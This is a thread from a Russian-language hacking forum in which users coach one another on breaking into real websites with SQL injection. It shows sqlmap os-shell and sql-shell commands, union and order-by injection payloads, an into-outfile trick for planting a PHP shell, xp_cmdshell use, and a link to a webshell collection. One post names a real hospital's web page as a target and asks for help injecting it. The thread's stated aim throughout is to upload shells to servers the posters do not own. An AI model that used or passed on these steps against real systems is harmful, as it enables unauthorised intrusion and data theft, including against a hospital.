ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

06.10.2019, 21:21
|
|
Guest
Сообщений: n/a
Провел на форуме: 96779
Репутация:
5
|
|
Сообщение от noppathee
noppathee said:
↑
sqlmap с параметром --os-shell такой результат:
os-shell> whoami
do you want to retrieve the command standard output? [Y/
[11:11:38] [INFO] retrieved: nt authority\network servic
command standard output: 'nt authority\network service'
os-shell>
Подскажите нубу плз, как дальше действовать, чтобы залить шелл через sqlmap?
Нашел в теме рекомендацию от BigBear по похожему вопросу: select '' into outfile '/[full_path]/x.php';
Но как узнать конечную директорию, в которую заливаться?
Спасибо!
ну надо знать путь, команда pwd, если путь не знаешь, тогда брутом, или искать где эти пути палятся
p.s путь в ошибке бывает показывает
|
|
|
|

07.10.2019, 02:34
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Сообщение от noppathee
noppathee said:
↑
sqlmap с параметром --os-shell такой результат:
os-shell> whoami
do you want to retrieve the command standard output? [Y/
[11:11:38] [INFO] retrieved: nt authority\network servic
command standard output: 'nt authority\network service'
os-shell>
Подскажите нубу плз, как дальше действовать, чтобы залить шелл через sqlmap?
Нашел в теме рекомендацию от BigBear по похожему вопросу: select '' into outfile '/[full_path]/x.php';
Но как узнать конечную директорию, в которую заливаться?
Спасибо!
sqlmap --os-shell -> 4 -> 2 итд
Сообщение от DezMond™
DezMond™ said:
↑
help!
Код:
Code:
https://www.clemenshospital.de/unternehmen/presse-und-aktuelles/pressemitteilungen/pressemitteilung/?cHash=3e1a0675b9b0455db1168f0342035939&tx_browser_pi1%5Bsort%5D=tx_browser_pi1%5Bsort%5D=a
Задетекти место инъекции
Сообщение от man474019
man474019 said:
↑
in target when try sleep() target loads and gives response 504 Gateway Time-out, also tested sleep(5), sleep(10) and etc.., same result (504)
scanners detects it sql injection, but sqlmap not
what means it vuln ? thanks in advance
p.s server is nginx
or 1=1; or 1=2; and etc
|
|
|
|

07.10.2019, 11:30
|
|
Guest
Сообщений: n/a
Провел на форуме: 54593
Репутация:
0
|
|
sql иньекция в POST запросе админ панели.
В поле логин при постановке кавычки показывает сообщение:
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''' LIMIT 2' at line 1
При переборе полей методом
Сообщение от None
' order by 6#
показывает сообщение
Сообщение от None
Unknown column '6' in 'order clause'
Если ' order by 5# то пользователь не найден
Запрос ' union select 1,2# дает результат:
Сообщение от None
The used SELECT statements have a different number of columns
А ' union+select+1,2,3,4,5#
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '
+select+1,2,3
' LIMIT 2' at line 1
То есть обрезается до 3 полей.
При ' union select 1,2,3,4,5#
и выводит ошибку:
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''
LIMIT 2
' at line 1
Как правильно составить запрос и почему не выводится кол-во полей?
' union select 1,2,3,4,5#или ' union+select+1,2,3,4,5#?
|
|
|
|

08.10.2019, 15:09
|
|
Guest
Сообщений: n/a
Провел на форуме: 54593
Репутация:
0
|
|
И в чем может проявляться проблема когда при слепой инъекции выводились данные со скрипом, а спустя сутки-двое при наличии той же уязвимости(её не закрыли) выводится
Сообщение от None
[13:56:51] [ERROR] invalid character detected. retrying..
[13:58:23] [ERROR] unable to properly validate last character value ('2')..
?
Запрос
Сообщение от None
--tamper=between --random-agent --time-sec=10 --delay=5 --sql-shell --hex
|
|
|
|

10.10.2019, 23:20
|
|
Guest
Сообщений: n/a
Провел на форуме: 1835
Репутация:
0
|
|
Сообщение от BabaDook
BabaDook said:
↑
sqlmap --os-shell -> 4 -> 2 итд
Нагуглить дальнейший метод действий не получилось. Подскажите плз, как дальше действовать или ткните в мануал какой-нибудь?
Цель: залить шелл.
Или как вариант заказал бы платную консультацию у профи, т.к. хочется понять как действовать, позадавать вопросы.
Спасибо!
|
|
|
|

11.10.2019, 01:08
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Ты вообще уверен что прав хватит?
если есть права,то один расклад, если нету, то другой. вообщем смотреть надо.
|
|
|
|

11.10.2019, 10:47
|
|
Guest
Сообщений: n/a
Провел на форуме: 1835
Репутация:
0
|
|
Сообщение от BabaDook
BabaDook said:
↑
Ты вообще уверен что прав хватит?
если есть права,то один расклад, если нету, то другой. вообщем смотреть надо.
Сообщение от man474019
man474019 said:
↑
try --current-user --is-dba
and see response true or false ? if false there're no variants for uploading shell via sqli/sqlmap

|
|
|
|

11.10.2019, 14:24
|
|
Guest
Сообщений: n/a
Провел на форуме: 92829
Репутация:
212
|
|
Сообщение от noppathee
noppathee said:
↑
Нагуглить дальнейший метод действий не получилось. Подскажите плз, как дальше действовать или ткните в мануал какой-нибудь?
Давайте смотреть что мы имеем и пытаться понять как нам действовать.
- Слепая инъекция
- Ос винда
- Субд mssql
- Текущий юзер DBA
Sqlmap нам явно говорит что xp_cmdshell без вывода в строке "unable to retrieve xp_cmdshell output"
Следовательно результат выполнения команды мы увидеть не можем.
Но для начала я бы рекомендовал вам ознакомится с sql синтаксисом, проведением sql инъекций и проведением sql инъекций в mssql в частности, если вы не знакомы.
Это даст понимание того что происходит и что делать дальше. Найти это можно как в гугле так и воспользовавшись поиском на форуме, ниже линк на sql inj в mssql, ну одна из статей на форуме.
/threads/30501/
Идем дальше. Несмотря на то что вывод в данном случае отсутствует, команды все равно могут выполнятся. Самый простой способ это проверить - команда ping
и смотреть в логах вашего сервера. Или сразу лить шелл в папку доступную из вне. О том какой командой лить есть по линку выше, либо воспльзовавшись гуглом можно
найти список команд командной строки, или запустить если у вас винда cmd.exe и забить команду help.
Следующий момент - asp. Ну я думаю вы понимаете что если используется asp, то и лить надо asp шелл. Такой можно найти по линку ниже, но надо быть осторожным - есть пробэкдореные.
https://github.com/tennc/webshell
Вот примерно куда вам нужно двигаться. Ну я бы во всяком случае двигался.
|
|
|
|

12.10.2019, 18:20
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Сообщение от noppathee
noppathee said:
↑

Тогда можешь выполнять системные команды. и сразу получить шелл. даже заливать ничего не надо
|
|
|
|

12.10.2019, 18:21
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Сообщение от Baskin-Robbins
Baskin-Robbins said:
↑
Давайте смотреть что мы имеем и пытаться понять как нам действовать. - Слепая инъекция
- Ос винда
- Субд mssql
- Текущий юзер DBA
Sqlmap нам явно говорит что xp_cmdshell без вывода в строке "unable to retrieve xp_cmdshell output"
Следовательно результат выполнения команды мы увидеть не можем.
Но для начала я бы рекомендовал вам ознакомится с sql синтаксисом, проведением sql инъекций и проведением sql инъекций в mssql в частности, если вы не знакомы.
Это даст понимание того что происходит и что делать дальше. Найти это можно как в гугле так и воспользовавшись поиском на форуме, ниже линк на sql inj в mssql, ну одна из статей на форуме.
/threads/30501/
Идем дальше. Несмотря на то что вывод в данном случае отсутствует, команды все равно могут выполнятся. Самый простой способ это проверить - команда ping
и смотреть в логах вашего сервера. Или сразу лить шелл в папку доступную из вне. О том какой командой лить есть по линку выше, либо воспльзовавшись гуглом можно
найти список команд командной строки, или запустить если у вас винда cmd.exe и забить команду help.
Следующий момент - asp. Ну я думаю вы понимаете что если используется asp, то и лить надо asp шелл. Такой можно найти по линку ниже, но надо быть осторожным - есть пробэкдореные.
https://github.com/tennc/webshell
Вот примерно куда вам нужно двигаться. Ну я бы во всяком случае двигался.
нам не надо получать вывод команд. Есть возможность получить шелл, и кстати вывод команд тоже можно получить
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|